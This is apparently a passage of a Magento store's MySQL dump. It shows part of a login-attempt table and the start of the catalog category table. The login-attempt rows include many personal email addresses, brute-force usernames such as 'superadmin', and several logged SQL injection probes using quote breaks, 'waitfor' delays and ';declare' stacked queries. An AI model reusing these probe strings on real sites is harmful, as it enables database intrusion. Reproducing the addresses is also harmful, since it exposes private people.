07:09:05'),('2','Pierce',5,'2020-08-24 07:22:38'),('2','piercehenrietta752@yahoo.com',1,'2022-04-22 10:55:03'),('2','Pierre',5,'2020-08-24 07:36:22'),('2','Piper',5,'2020-08-24 07:49:53'),('2','platsvonnie@yahoo.com',12,'2022-04-24 17:47:47'),('2','Porter',5,'2020-08-24 08:02:42'),('2','pos',2,'2021-02-11 09:27:53'),('2','Presley',5,'2020-08-24 08:15:56'),('2','Preston',5,'2020-08-24 08:29:35'),('2','Prince',5,'2020-08-24 08:42:50'),('2','Princess',5,'2020-08-24 08:55:52'),('2','Princeton',5,'2020-08-24 09:09:30'),('2','Priscilla',5,'2020-08-24 09:23:33'),('2','purchasing@grandtek.net',12,'2022-03-18 19:32:26'),('2','pybus.avril@yahoo.com',10,'2022-04-25 13:50:47'),('2','queenie.macvicar@yahoo.com',5,'2022-04-21 01:39:39'),('2','Quentin',5,'2020-08-24 09:36:30'),('2','Quincy',4,'2020-08-24 09:49:50'),('2','Quinn',5,'2020-08-24 10:03:14'),('2','Quintin',5,'2020-08-24 10:16:49'),('2','Quinton',5,'2020-08-24 10:29:35'),('2','Rachel',5,'2020-08-24 10:42:38'),('2','Raegan',5,'2020-08-24 10:55:52'),('2','Raelyn',5,'2020-08-24 11:09:02'),('2','Raelynn',5,'2020-08-24 11:21:45'),('2','Rafael',5,'2020-08-24 11:35:00'),('2','Raiden',5,'2020-08-24 11:48:36'),('2','Raina',3,'2020-08-24 11:56:39'),('2','rakusofushibo@gmail.com',12,'2020-11-03 09:18:51'),('2','Ramon',4,'2020-08-24 12:28:04'),('2','Randall',5,'2020-08-24 12:41:47'),('2','randi_picthall@yahoo.com',12,'2022-04-27 21:21:16'),('2','Randy',5,'2020-08-24 12:54:34'),('2','Raphael',5,'2020-08-24 13:07:32'),('2','Raquel',5,'2020-08-24 13:20:54'),('2','Rashad',5,'2020-08-24 13:34:44'),('2','rasivongnilun@gmail.com',12,'2022-03-12 06:53:15'),('2','Raul',5,'2020-08-24 13:47:35'),('2','Raven',5,'2020-08-24 14:01:17'),('2','Ray',5,'2020-08-24 14:15:15'),('2','Rayan',5,'2020-08-24 14:29:19'),('2','Rayden',5,'2020-08-24 14:42:49'),('2','Raylan',5,'2020-08-24 14:56:40'),('2','Raymond',5,'2020-08-24 15:10:55'),('2','Rayna',5,'2020-08-24 15:24:23'),('2','Rayne',5,'2020-08-24 15:39:00'),('2','Reagan',5,'2020-08-24 15:52:43'),('2','Rebecca',5,'2020-08-24 16:06:36'),('2','Rebekah',5,'2020-08-24 16:19:41'),('2','Redstage',1,'2020-09-27 12:43:29'),('2','redstore',1,'2020-06-20 22:10:38'),('2','Reece',5,'2020-08-24 16:33:06'),('2','Reed',5,'2020-08-24 16:46:40'),('2','Reese',5,'2020-08-24 17:00:03'),('2','Regan',5,'2020-08-24 17:12:39'),('2','Regina',5,'2020-08-24 17:25:43'),('2','Reginald',5,'2020-08-24 17:39:08'),('2','Reid',5,'2020-08-24 17:51:57'),('2','Remi',5,'2020-08-24 18:04:25'),('2','Remington',5,'2020-08-24 18:17:41'),('2','Remy',5,'2020-08-24 18:31:14'),('2','Renata',5,'2020-08-24 18:44:06'),('2','Rene',5,'2020-08-24 18:57:15'),('2','Renee',5,'2020-08-24 19:10:41'),('2','Reuben',5,'2020-08-24 19:24:38'),('2','Rex',5,'2020-08-24 19:37:36'),('2','Rey',5,'2020-08-24 19:50:47'),('2','Reyna',5,'2020-08-24 20:04:21'),('2','reyner.matha@yahoo.com',12,'2022-04-07 04:50:25'),('2','rezayiireza784@gmail.com',10,'2022-04-29 00:44:41'),('2','Rhett',5,'2020-08-24 20:18:00'),('2','Rhys',5,'2020-08-24 20:30:52'),('2','ricarda.shiel@yahoo.com',4,'2022-04-08 01:02:43'),('2','Ricardo',5,'2020-08-24 20:44:01'),('2','Richard',5,'2020-08-24 20:57:30'),('2','Ricky',5,'2020-08-24 21:10:44'),('2','right.mindi@yahoo.com',5,'2022-03-25 20:58:46'),('2','Rihanna',5,'2020-08-24 21:23:44'),('2','Riley',5,'2020-08-24 21:37:04'),('2','ritakeir685@yahoo.com',12,'2022-04-19 13:11:24'),('2','River',5,'2020-08-24 21:50:45'),('2','Rivka',5,'2020-08-24 22:03:43'),('2','Robert',5,'2020-08-24 22:17:03'),('2','Roberto',5,'2020-08-24 22:30:37'),('2','robsonvalerie56@yahoo.com',6,'2022-04-29 01:39:23'),('2','Rocco',5,'2020-08-24 22:44:43'),('2','rocketweb',1,'2020-06-23 04:19:08'),('2','Rocky',5,'2020-08-24 22:57:44'),('2','Rodney',5,'2020-08-24 23:11:11'),('2','Rodolfo',5,'2020-08-24 23:24:56'),('2','Rodrigo',5,'2020-08-24 23:38:42'),('2','RODRIGUE',1,'2021-01-31 02:22:41'),('2','Rogelio',5,'2020-08-24 23:51:52'),('2','Roger',5,'2020-08-25 00:05:28'),('2','Rohan',5,'2020-08-25 00:19:39'),('2','Roland',5,'2020-08-25 00:33:07'),('2','Rolando',5,'2020-08-25 00:46:31'),('2','roma',1,'2020-12-11 22:29:34'),('2','Roman',5,'2020-08-25 01:00:10'),('2','Romeo',5,'2020-08-25 01:14:23'),('2','romig.maudie@yahoo.com',12,'2022-04-24 14:09:26'),('2','Ronald',5,'2020-08-25 01:27:34'),('2','Ronan',5,'2020-08-25 01:41:04'),('2','Ronin',5,'2020-08-25 01:54:39'),('2','Ronnie',5,'2020-08-25 02:08:13'),('2','Rory',5,'2020-08-25 02:21:18'),('2','Rosa',5,'2020-08-25 02:34:36'),('2','rosalia.shellhouse@yahoo.com',10,'2022-04-18 11:03:48'),('2','Rosalie',5,'2020-08-25 02:48:23'),('2','Rose',5,'2020-08-25 03:01:36'),('2','Roselyn',5,'2020-08-25 03:14:43'),('2','Rosemary',5,'2020-08-25 03:27:59'),('2','Rosie',5,'2020-08-25 03:41:24'),('2','Rowan',5,'2020-08-25 03:53:57'),('2','rowand.ellan@yahoo.com',12,'2022-04-27 05:47:34'),('2','Rowen',5,'2020-08-25 04:06:44'),('2','Roxanne',5,'2020-08-25 04:19:55'),('2','Roy',5,'2020-08-25 04:33:50'),('2','Royal',5,'2020-08-25 04:46:34'),('2','Royce',5,'2020-08-25 04:59:31'),('2','rssrebecca.tolliver@gmail.com',12,'2022-03-14 23:18:10'),('2','Ruben',5,'2020-08-25 05:12:55'),('2','Ruby',5,'2020-08-25 05:26:29'),('2','Rudy',5,'2020-08-25 05:39:15'),('2','Russell',5,'2020-08-25 05:52:21'),('2','Ruth',5,'2020-08-25 06:05:51'),('2','rwxdesign',1,'2020-06-21 08:32:28'),('2','Ryan',5,'2020-08-25 06:19:22'),('2','Ryann',5,'2020-08-25 06:32:20'),('2','rycroft.chery@yahoo.com',8,'2022-03-19 18:04:14'),('2','Ryder',5,'2020-08-25 06:45:42'),('2','Ryker',5,'2020-08-25 06:59:28'),('2','Rylan',5,'2020-08-25 07:12:36'),('2','Ryland',5,'2020-08-25 07:25:25'),('2','Rylee',5,'2020-08-25 07:38:37'),('2','Ryleigh',5,'2020-08-25 07:52:04'),('2','Rylie',5,'2020-08-25 08:04:35'),('2','Sabrina',5,'2020-08-25 08:17:27'),('2','Sadie',5,'2020-08-25 08:30:43'),('2','sadmin',1,'2021-01-27 04:22:30'),('2','Sage',5,'2020-08-25 08:44:15'),('2','Saige',5,'2020-08-25 08:56:55'),('2','Salma',5,'2020-08-25 09:09:54'),('2','Salvador',5,'2020-08-25 09:23:14'),('2','Salvatore',5,'2020-08-25 09:36:42'),('2','Sam',5,'2020-08-25 09:49:11'),('2','Samantha',5,'2020-08-25 10:02:08'),('2','Samara',5,'2020-08-25 10:15:27'),('2','Samir',5,'2020-08-25 10:28:40'),('2','Samiyah',5,'2020-08-25 10:41:13'),('2','Samson',5,'2020-08-25 10:54:01'),('2','Samuel',5,'2020-08-25 11:07:11'),('2','sandersonsherlene@yahoo.com',12,'2022-04-19 17:06:00'),('2','Sandra',5,'2020-08-25 11:20:13'),('2','Saniya',5,'2020-08-25 11:32:49'),('2','Saniyah',5,'2020-08-25 11:45:56'),('2','Santana',5,'2020-08-25 11:59:20'),('2','Santiago',5,'2020-08-25 12:12:22'),('2','santinagillison@yahoo.com',5,'2022-04-19 00:05:49'),('2','Santino',5,'2020-08-25 12:25:32'),('2','Santos',5,'2020-08-25 12:39:14'),('2','Sara',5,'2020-08-25 12:53:09'),('2','Sarah',5,'2020-08-25 13:06:06'),('2','Sarahi',5,'2020-08-25 13:19:20'),('2','sarahinnes123@gmail.com',1,'2021-01-27 10:47:34'),('2','Sarai',5,'2020-08-25 13:33:07'),('2','sarelsamantha@gmail.com',7,'2022-03-23 11:21:33'),('2','Sariah',5,'2020-08-25 13:46:53'),('2','Sasha',5,'2020-08-25 14:00:22'),('2','Saul',5,'2020-08-25 14:13:45'),('2','Savanna',5,'2020-08-25 14:27:43'),('2','Savannah',5,'2020-08-25 14:41:21'),('2','Sawyer',5,'2020-08-25 14:54:30'),('2','Saylor',5,'2020-08-25 15:08:10'),('2','scales.rosita@yahoo.com',2,'2022-04-22 07:51:31'),('2','Scarlet',5,'2020-08-25 15:22:10'),('2','Scarlett',5,'2020-08-25 15:35:12'),('2','Scarlette',5,'2020-08-25 15:48:26'),('2','Scott',6,'2020-12-11 10:13:48'),('2','scrope.fernanda@yahoo.com',4,'2022-04-25 09:19:47'),('2','Seamus',5,'2020-08-25 16:15:50'),('2','Sean',5,'2020-08-25 16:28:51'),('2','searchspring',1,'2020-09-25 23:06:47'),('2','Sebastian',5,'2020-08-25 16:42:14'),('2','Selah',5,'2020-08-25 16:55:50'),('2','Selena',5,'2020-08-25 17:09:07'),('2','Semaj',5,'2020-08-25 17:21:58'),('2','Serena',5,'2020-08-25 17:35:21'),('2','Serenity',5,'2020-08-25 17:49:13'),('2','Sergio',5,'2020-08-25 18:02:19'),('2','service',1,'2020-06-21 01:51:02'),('2','Seth',5,'2020-08-25 18:15:15'),('2','shanda.webb@yahoo.com',6,'2022-04-16 13:08:55'),('2','Shane',5,'2020-08-25 18:28:32'),('2','Shannon',5,'2020-08-25 18:42:15'),('2','Sharon',5,'2020-08-25 18:55:22'),('2','Sharonntjennifereb9057@gmail.com',8,'2022-04-17 02:34:43'),('2','Shaun',5,'2020-08-25 19:08:40'),('2','Shawn',5,'2020-08-25 19:21:37'),('2','shawnahowen@gmail.com',12,'2022-03-16 19:12:09'),('2','Shayla',5,'2020-08-25 19:34:49'),('2','shaz1xx@icloud.com',12,'2022-03-19 21:03:02'),('2','shelba_garside@yahoo.com',4,'2022-04-22 01:11:10'),('2','Shelby',5,'2020-08-25 19:46:55'),('2','shelik7421jaber@gmail.com',4,'2022-04-04 02:29:57'),('2','Shellydrink',1,'2021-03-11 13:24:07'),('2','sherikahollimanvx823@gmail.com',2,'2022-03-08 20:28:48'),('2','sherise.m49@yahoo.com',12,'2022-04-22 02:24:23'),('2','Sherlyn',5,'2020-08-25 19:59:04'),('2','Shiloh',5,'2020-08-25 20:11:33'),('2','shipstation',1,'2020-09-29 14:52:34'),('2','shondaputland@yahoo.com',11,'2022-04-24 15:06:52'),('2','Sidney',5,'2020-08-25 20:24:35'),('2','Siena',5,'2020-08-25 20:36:55'),('2','Sienna',5,'2020-08-25 20:49:22'),('2','Sierra',5,'2020-08-25 21:02:14'),('2','Silas',5,'2020-08-25 21:15:27'),('2','silkdev',1,'2020-09-30 15:08:56'),('2','Simon',5,'2020-08-25 21:27:46'),('2','Simone',5,'2020-08-25 21:40:38'),('2','Sincere',5,'2020-08-25 21:53:52'),('2','sislerj@gmail.com',6,'2022-03-23 20:18:16'),('2','Sky',5,'2020-08-25 22:07:03'),('2','Skye',5,'2020-08-25 22:19:46'),('2','Skyla',5,'2020-08-25 22:32:47'),('2','Skylar',5,'2020-08-25 22:46:10'),('2','Skyler',5,'2020-08-25 22:59:25'),('2','Sloan',5,'2020-08-25 23:12:24'),('2','Sloane',5,'2020-08-25 23:25:45'),('2','Sofia',5,'2020-08-25 23:39:25'),('2','Solomon',5,'2020-08-25 23:52:32'),('2','somervale.kathie@yahoo.com',12,'2022-04-24 19:05:17'),('2','Sonia',5,'2020-08-26 00:05:18'),('2','Sonny',5,'2020-08-26 00:18:41'),('2','Sophia',6,'2020-08-26 00:32:24'),('2','Sophie',5,'2020-08-26 00:45:17'),('2','Soren',5,'2020-08-26 00:58:03'),('2','specialtyadv@hotmail.com',12,'2022-03-13 21:46:17'),('2','Spencer',5,'2020-08-26 01:11:13'),('2','springbot',1,'2020-06-21 02:31:41'),('2','standaloft.jayne@yahoo.com',2,'2022-04-30 00:34:00'),('2','Stanley',5,'2020-08-26 01:24:51'),('2','starshipit',1,'2020-06-21 02:52:42'),('2','Stefan',5,'2020-08-26 01:37:24'),('2','Stella',5,'2020-08-26 01:50:28'),('2','Stephanie',5,'2020-08-26 02:04:01'),('2','Stephen',5,'2020-08-26 02:17:45'),('2','stephnie_h@yahoo.com',6,'2022-04-05 01:36:52'),('2','Sterling',5,'2020-08-26 02:30:40'),('2','sterlingriders@gmail.com',8,'2022-03-23 22:19:59'),('2','Stetson',5,'2020-08-26 02:44:00'),('2','Steve',5,'2020-08-26 02:57:30'),('2','Steven',5,'2020-08-26 03:10:38'),('2','stone.phung@yahoo.com',2,'2022-04-19 11:20:48'),('2','storefront',1,'2020-06-21 06:22:50'),('2','stupid',1,'2020-06-21 11:51:54'),('2','Sullivan',5,'2020-08-26 03:23:34'),('2','Summer',5,'2020-08-26 03:36:38'),('2','sungarnsey@yahoo.com',2,'2022-04-02 05:32:21'),('2','superadmin',2,'2020-06-20 21:28:43'),('2','support',4,'2022-04-16 01:04:42'),('2','suru27g@gmail.com',1,'2020-05-12 13:34:17'),('2','surya01gautam@gmail.com',1,'2020-09-06 09:11:48'),('2','Susan',5,'2020-08-26 03:50:02'),('2','Sutton',5,'2020-08-26 04:02:36'),('2','swatalinsahoo76@gmail.com',2,'2020-09-07 06:48:15'),('2','swatimishra',28,'2022-03-31 04:35:50'),('2','swatimishra.com',1,'2022-03-28 23:56:33'),('2','swatimishraworld@gmail.com',3,'2020-06-20 07:08:26'),('2','swats03@gmail.com',2,'2020-06-23 12:07:10'),('2','Sydney',5,'2020-08-26 04:15:34'),('2','Sylas',5,'2020-08-26 04:29:03'),('2','Sylvia',5,'2020-08-26 04:42:56'),('2','t.thresa@yahoo.com',12,'2022-04-17 06:46:06'),('2','Tabitha',5,'2020-08-26 04:55:45'),('2','tahaehsani651@gmail.com',7,'2022-03-23 22:06:41'),('2','Talia',5,'2020-08-26 05:09:17'),('2','Taliyah',5,'2020-08-26 05:23:11'),('2','Talon',5,'2020-08-26 05:37:00'),('2','Tamia',5,'2020-08-26 05:49:49'),('2','Tanner',5,'2020-08-26 06:03:00'),('2','Tara',5,'2020-08-26 06:16:40'),('2','Taryn',5,'2020-08-26 06:30:01'),('2','Tate',5,'2020-08-26 06:43:02'),('2','Tatiana',5,'2020-08-26 06:56:05'),('2','Tatum',5,'2020-08-26 07:09:38'),('2','Taylor',5,'2020-08-26 07:22:41'),('2','Teagan',5,'2020-08-26 07:35:32'),('2','techsupport',1,'2022-04-06 21:14:52'),('2','Tegan',5,'2020-08-26 07:49:00'),('2','telosyro@mailinator.com',91,'2022-04-19 11:49:02'),('2','telosyro@mailinator.com\"',1,'2022-04-19 11:45:09'),('2','telosyro@mailinator.com\'',3,'2022-04-19 11:40:32'),('2','telosyro@mailinator.com\' and \'10',1,'2022-04-19 11:44:00'),('2','telosyro@mailinator.com\' and \'24',1,'2022-04-19 11:44:08'),('2','telosyro@mailinator.com\' and \'34',1,'2022-04-19 11:43:51'),('2','telosyro@mailinator.com\' and \'95',1,'2022-04-19 11:44:17'),('2','telosyro@mailinator.com\' and (se',1,'2022-04-19 11:42:46'),('2','telosyro@mailinator.com\' and 646',1,'2022-04-19 11:44:52'),('2','telosyro@mailinator.com\' and 728',1,'2022-04-19 11:44:24'),('2','telosyro@mailinator.com\' and 844',1,'2022-04-19 11:44:58'),('2','telosyro@mailinator.com\' and 889',1,'2022-04-19 11:45:04'),('2','telosyro@mailinator.com\' waitfor',1,'2022-04-19 11:42:50'),('2','telosyro@mailinator.com\'\'',4,'2022-04-19 11:41:48'),('2','telosyro@mailinator.com\'(select*',1,'2022-04-19 11:41:53'),('2','telosyro@mailinator.com\');declar',1,'2022-04-19 11:38:13'),('2','telosyro@mailinator.com\')waitfor',1,'2022-04-19 11:42:52'),('2','telosyro@mailinator.com\'+(select',2,'2022-04-19 11:41:56'),('2','telosyro@mailinator.com\',0)waitf',1,'2022-04-19 11:42:54'),('2','telosyro@mailinator.com\';declare',1,'2022-04-19 11:38:05'),('2','telosyro@mailinator.com\'||(selec',1,'2022-04-19 11:37:55'),('2','telosyro@mailinator.com);declare',1,'2022-04-19 11:38:09'),('2','telosyro@mailinator.com,(select*',1,'2022-04-19 11:42:48'),('2','telosyro@mailinator.com33965480\'',1,'2022-04-19 11:43:03'),('2','telosyro@mailinator.com40182114\'',1,'2022-04-19 11:43:34'),('2','telosyro@mailinator.com41077028\'',1,'2022-04-19 11:43:26'),('2','telosyro@mailinator.com63381986\'',1,'2022-04-19 11:43:45'),('2','telosyro@mailinator.com69436563\'',1,'2022-04-19 11:42:57'),('2','telosyro@mailinator.com76387500\'',1,'2022-04-19 11:43:40'),('2','telosyro@mailinator.com85907864\'',1,'2022-04-19 11:43:17'),('2','telosyro@mailinator.com89023268\'',1,'2022-04-19 11:43:09'),('2','telosyro@mailinator.com;declare ',1,'2022-04-19 11:38:00'),('2','telosyro@mailinator.comhsl77hrc0',1,'2022-04-19 11:37:43'),('2','Temperance',5,'2020-08-26 08:02:37'),('2','Tenley',5,'2020-08-26 08:15:16'),('2','tereasachetwynd@yahoo.com',8,'2022-04-13 19:45:36'),('2','Teresa',5,'2020-08-26 08:28:20'),('2','Terrance',5,'2020-08-26 08:41:46'),('2','Terrell',5,'2020-08-26 08:55:42'),('2','Terrence',5,'2020-08-26 09:08:35'),('2','Terry',5,'2020-08-26 09:21:50'),('2','Tess',5,'2020-08-26 09:35:33'),('2','Tessa',5,'2020-08-26 09:48:40'),('2','Test',2,'2022-03-28 05:21:50'),('2','Thaddeus',5,'2020-08-26 10:00:57'),('2','Thalia',5,'2020-08-26 10:13:39'),('2','Thatcher',5,'2020-08-26 10:26:49'),('2','theigionqh@gmail.com',12,'2020-10-15 06:35:54'),('2','Theo',5,'2020-08-26 10:39:48'),('2','Theodore',5,'2020-08-26 10:52:05'),('2','theripsidol@gmail.com',2,'2022-04-25 23:50:01'),('2','Thiago',5,'2020-08-26 11:04:53'),('2','Thomas',5,'2020-08-26 11:18:25'),('2','Tiana',5,'2020-08-26 11:31:37'),('2','Tiffany',5,'2020-08-26 11:44:47'),('2','Timothy',5,'2020-08-26 11:58:23'),('2','tinisha_littlejohn@yahoo.com',2,'2022-04-21 18:21:03'),('2','Tinley',5,'2020-08-26 12:12:10'),('2','Titan',5,'2020-08-26 12:25:15'),('2','Titus',5,'2020-08-26 12:38:30'),('2','Tobias',5,'2020-08-26 12:52:21'),('2','Toby',5,'2020-08-26 13:06:14'),('2','Todd',5,'2020-08-26 13:19:16'),('2','Tomas',5,'2020-08-26 13:32:34'),('2','Tommy',5,'2020-08-26 13:46:37'),('2','tonette_edmonds@yahoo.com',2,'2022-04-20 11:44:15'),('2','Tony',5,'2020-08-26 13:59:45'),('2','tonytalbert@yahoo.com',12,'2022-04-08 13:18:08'),('2','topdentalcare82@gmail.com',2,'2022-03-14 19:22:32'),('2','tora_hinkle@yahoo.com',2,'2022-03-14 20:23:55'),('2','Tori',5,'2020-08-26 14:12:50'),('2','torrie.hepworth@yahoo.com',12,'2022-03-24 11:25:04'),('2','Trace',5,'2020-08-26 14:26:23'),('2','trangtoll@yahoo.com',6,'2022-04-24 13:54:47'),('2','Travis',5,'2020-08-26 14:40:21'),('2','Trent',5,'2020-08-26 14:53:42'),('2','Trenton',5,'2020-08-26 15:06:51'),('2','Trevor',5,'2020-08-26 15:20:47'),('2','Trey',5,'2020-08-26 15:35:23'),('2','Trinity',5,'2020-08-26 15:49:04'),('2','Tripp',5,'2020-08-26 16:02:47'),('2','Tristan',5,'2020-08-26 16:17:10'),('2','Tristen',5,'2020-08-26 16:30:38'),('2','Tristian',5,'2020-08-26 16:43:47'),('2','Tristin',5,'2020-08-26 16:57:33'),('2','Triston',5,'2020-08-26 17:11:21'),('2','trollopecelestine@yahoo.com',8,'2022-04-28 00:06:32'),('2','Troy',5,'2020-08-26 17:24:29'),('2','Truman',5,'2020-08-26 17:37:35'),('2','Tucker',5,'2020-08-26 17:51:00'),('2','tuenbull.carlie@yahoo.com',8,'2022-03-20 09:11:20'),('2','Turner',5,'2020-08-26 18:04:31'),('2','Ty',5,'2020-08-26 18:17:12'),('2','Tyler',5,'2020-08-26 18:30:07'),('2','Tyree',5,'2020-08-26 18:43:17'),('2','Tyrell',5,'2020-08-26 18:56:26'),('2','Tyrone',5,'2020-08-26 19:08:49'),('2','Tyson',5,'2020-08-26 19:21:37'),('2','tyuiooerej@gmail.com',1,'2022-03-29 09:25:17'),('2','Ulises',5,'2020-08-26 19:34:45'),('2','ulluratu111@gmail.com',10,'2020-11-28 15:28:59'),('2','Uriah',5,'2020-08-26 19:47:44'),('2','Uriel',5,'2020-08-26 20:00:09'),('2','Urijah',5,'2020-08-26 20:12:59'),('2','u_minda@yahoo.com',11,'2022-04-13 16:54:24'),('2','Valentin',5,'2020-08-26 20:26:17'),('2','Valentina',5,'2020-08-26 20:39:22'),('2','Valentino',5,'2020-08-26 20:51:52'),('2','Valeria',5,'2020-08-26 21:04:34'),('2','Valerie',5,'2020-08-26 21:17:40'),('2','Van',5,'2020-08-26 21:30:32'),('2','Vance',5,'2020-08-26 21:43:07'),('2','Vanessa',5,'2020-08-26 21:55:56'),('2','vannessa.norgaard@yahoo.com',10,'2022-04-18 04:32:04'),('2','Vaughn',5,'2020-08-26 22:09:46'),('2','Vera',5,'2020-08-26 22:22:59'),('2','Veronica',5,'2020-08-26 22:35:45'),('2','veteran',1,'2020-06-21 11:07:22'),('2','Vicente',5,'2020-08-26 22:49:06'),('2','vickikim37@gmail.com',1,'2022-03-22 08:38:31'),('2','Victor',5,'2020-08-26 23:02:33'),('2','Victoria',5,'2020-08-26 23:15:17'),('2','victoriabarfield95@yahoo.com',8,'2022-03-23 06:40:51'),('2','Vihaan',5,'2020-08-26 23:28:03'),('2','Vincent',5,'2020-08-26 23:41:04'),('2','Vincenzo',5,'2020-08-26 23:54:34'),('2','Violet',5,'2020-08-27 00:07:21'),('2','Virginia',5,'2020-08-27 00:20:41'),('2','Vivian',5,'2020-08-27 00:34:28'),('2','Viviana',5,'2020-08-27 00:48:01'),('2','Vivienne',5,'2020-08-27 01:00:50'),('2','vogtjaney@yahoo.com',8,'2022-03-29 02:38:53'),('2','Wade',5,'2020-08-27 01:14:09'),('2','Walker',5,'2020-08-27 01:27:53'),('2','Walter',5,'2020-08-27 01:41:09'),('2','Warren',5,'2020-08-27 01:54:09'),('2','Waylon',5,'2020-08-27 02:07:29'),('2','Wayne',5,'2020-08-27 02:21:11'),('2','webinfo',1,'2020-06-21 00:08:18'),('2','wellsshhjdt@gmail.com',12,'2022-04-05 21:47:33'),('2','wendi_thurston@yahoo.com',4,'2022-03-17 02:31:25'),('2','Wendy',5,'2020-08-27 02:34:17'),('2','Wesley',5,'2020-08-27 02:47:15'),('2','Westin',5,'2020-08-27 03:00:30'),('2','Weston',5,'2020-08-27 03:14:02'),('2','Whitney',5,'2020-08-27 03:26:39'),('2','wigglesworth.jeffrey@yahoo.com',12,'2022-04-19 00:36:06'),('2','Will',5,'2020-08-27 03:39:37'),('2','Willa',5,'2020-08-27 03:52:50'),('2','William',5,'2020-08-27 04:06:12'),('2','Willie',5,'2020-08-27 04:18:57'),('2','Willow',5,'2020-08-27 04:32:09'),('2','Wilson',5,'2020-08-27 04:45:27'),('2','wilsonbarkworthevette@yahoo.com',4,'2022-04-24 13:34:03'),('2','Winston',5,'2020-08-27 04:58:44'),('2','Winter',5,'2020-08-27 05:11:31'),('2','worrall.jannette@yahoo.com',6,'2022-04-28 15:55:35'),('2','Wren',5,'2020-08-27 05:24:41'),('2','wrigleycarolyne@yahoo.com',12,'2022-04-10 02:02:48'),('2','Wyatt',5,'2020-08-27 05:38:10'),('2','wynn.soledad@yahoo.com',10,'2022-03-25 10:50:50'),('2','Wynter',5,'2020-08-27 05:51:03'),('2','Xander',5,'2020-08-27 06:03:42'),('2','Xavi',5,'2020-08-27 06:17:05'),('2','Xavier',5,'2020-08-27 06:30:21'),('2','Ximena',5,'2020-08-27 06:42:58'),('2','xpos-admin',1,'2020-09-30 03:02:35'),('2','xSouL',2,'2020-06-21 12:58:28'),('2','xtento',2,'2021-03-29 14:42:47'),('2','xycuwaj',1,'2022-04-19 10:53:55'),('2','Xzavier',5,'2020-08-27 06:55:33'),('2','Yadiel',5,'2020-08-27 07:08:36'),('2','Yael',5,'2020-08-27 07:22:00'),('2','Yahir',5,'2020-08-27 07:34:41'),('2','Yair',5,'2020-08-27 07:47:42'),('2','Yamileth',5,'2020-08-27 08:00:54'),('2','Yareli',5,'2020-08-27 08:14:40'),('2','Yaretzi',5,'2020-08-27 08:27:31'),('2','Yaritza',5,'2020-08-27 08:40:47'),('2','Yasmin',5,'2020-08-27 08:54:27'),('2','Yosef',5,'2020-08-27 09:08:12'),('2','Yousef',5,'2020-08-27 09:21:15'),('2','yuhonkorigu@gmail.com',10,'2020-10-28 04:20:16'),('2','Yusuf',5,'2020-08-27 09:34:45'),('2','Zachariah',5,'2020-08-27 09:48:39'),('2','Zachary',5,'2020-08-27 10:01:48'),('2','Zackary',5,'2020-08-27 10:15:01'),('2','Zahra',5,'2020-08-27 10:28:40'),('2','Zaid',5,'2020-08-27 10:43:14'),('2','Zaiden',5,'2020-08-27 10:56:18'),('2','Zain',5,'2020-08-27 11:09:39'),('2','Zainab',5,'2020-08-27 11:23:35'),('2','Zaire',5,'2020-08-27 11:37:17'),('2','Zander',5,'2020-08-27 11:50:08'),('2','Zane',5,'2020-08-27 12:03:27'),('2','Zaniyah',5,'2020-08-27 12:17:21'),('2','Zara',5,'2020-08-27 12:30:54'),('2','Zaria',5,'2020-08-27 12:43:56'),('2','Zariah',5,'2020-08-27 12:57:07'),('2','Zariyah',5,'2020-08-27 13:10:40'),('2','Zavier',5,'2020-08-27 13:23:41'),('2','Zayden',5,'2020-08-27 13:36:50'),('2','Zayn',5,'2020-08-27 13:50:25'),('2','Zayne',5,'2020-08-27 14:04:12'),('2','Zechariah',5,'2020-08-27 14:17:09'),('2','Zeke',5,'2020-08-27 14:30:17'),('2','zendesk9',1,'2020-06-21 01:09:48'),('2','Zion',5,'2020-08-27 14:43:51'),('2','Zoe',5,'2020-08-27 14:57:27'),('2','Zoey',5,'2020-08-27 15:10:11'),('2','zohosupport',3,'2020-06-20 23:08:21'),('2','Zoie',5,'2020-08-27 15:23:26'),('2','Zuri',5,'2020-08-27 15:37:04');

--
-- Table structure for table `catalog_category_entity`
--

CREATE TABLE `catalog_category_entity` (
  `entity_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity ID',
  `attribute_set_id` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Attribute Set ID',
  `parent_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Parent Category ID',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Creation Time',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Update Time',
  `path` varchar(255) NOT NULL COMMENT 'Tree Path',
  `position` int(11) NOT NULL COMMENT 'Position',
  `level` int(11) NOT NULL DEFAULT 0 COMMENT 'Tree Level',
  `children_count` int(11) NOT NULL COMMENT 'Child Count',
  PRIMARY KEY (`entity_id`),
  KEY `CATALOG_CATEGORY_ENTITY_LEVEL` (`level`),
  KEY `CATALOG_CATEGORY_ENTITY_PATH` (`path`)
) ENGINE=InnoDB AUTO_INCREMENT=26 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Catalog Category Table';

--
-- Dumping data for table `catalog_category_entity`
--

INSERT INTO `catalog_category_entity` VALUES (1,3,0,'2020-01-09 12:15:55','2020-07-02 13:23:36','1',0,0,22),(2,3,1,'2020-01-09 12:15:56','2020-07-02 13:23:36','1/2',1,1,21),(3,3,6,'2020-01-11 18:00:33','2020-06-05 05:54:41','1/2/6/3',1,3,0),(4,3,6,'2020-01-11 18:14:48','2020-03-15 13:31:31','1/2/6/4',2,3,0),(5,3,6,'2020-01-11 18:16:03','2020-06-05 05:54:22','1/2/6/5',3,3,0),(6,3,2,'2020-01-22 13:34:09','2020-06-20 05:21:57','1/2/6',1,2,5),(7,3,6,'2020-02-27 13:49:28','2020-02-27 13:49:28','1/2/6/7',4,3,0),(8,3,2,'2020-03-15 10:45:37','2020-03-15 10:45:37','1/2/8',2,2,0),(9,3,2,'2020-03-15 12:59:38','2020-03-15 12:59:38','1/2/9',3,2,0),(11,3,2,'2020-03-23 09:24:20','2020-03-23 09:24:20','1/2/11',4,2,0),(12,3,6,'2020-04-18 14:57:26','2020-04-26 13:35:17','1/2/6/12',5,3,0),(13,3,2,'2020-05-19 12:34:31','2020-07-02 13:23:36','1/2/13',5,2,11),(14,3,13,'2020-06-05 04:23:27','2020-06-22 03:54:47','1/2/13/14',1,3,0),(15,3,13,'2020-06-05 04:23:53','2020-06-05 04:23:53','1/2/13/15',2,3,0),(16,3,13,'2020-06-05 04:24:34','2020-06-05 04:24:34','1/2/13/16',3,3,0),(17,3,13,'2020-06-05 04:24:51','2020-06-05 